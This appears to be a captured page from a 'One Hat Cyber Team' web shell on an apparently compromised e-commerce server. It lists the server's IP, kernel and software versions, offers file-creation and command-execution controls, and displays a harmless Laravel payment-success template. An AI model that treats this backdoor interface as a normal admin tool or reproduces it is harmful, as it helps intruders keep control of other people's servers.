⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.77
Server IP:
13.127.59.50
Server:
Linux ip-172-31-46-210 5.15.0-1033-aws #37~20.04.1-Ubuntu SMP Fri Mar 17 11:39:30 UTC 2023 x86_64
Server Software:
Apache/2.4.41 (Ubuntu)
PHP Version:
7.4.3-4ubuntu2.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
var
/
www
/
ecommerce_pg
/
resources
/
views
/
payments
/
wl
/
View File Name :
success.blade.php
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link href="https://fonts.googleapis.com/css2?family=Open+Sans:wght@300;400&display=swap" rel="stylesheet"> <link rel="stylesheet" href="{{asset('wl/style.css')}}"> <title>Payment Success</title> </head> <body> <div class="payment__sts payment_block_2"> <div class="payment__sts_icon"> <img src="{{asset('/wl/img/2_success_icon.png')}}" alt="icon close" /> </div> <div class="payment__txt"> <h6 class="payment__txt_head">Payment is Successful</h6> <p>You will be redirect to merchant site</p> <button class="payment__cta_close" onclick="window.close()">Close</button> </div> </div> <script> setTimeout(function () { window.close() },5000) </script> </body> </html>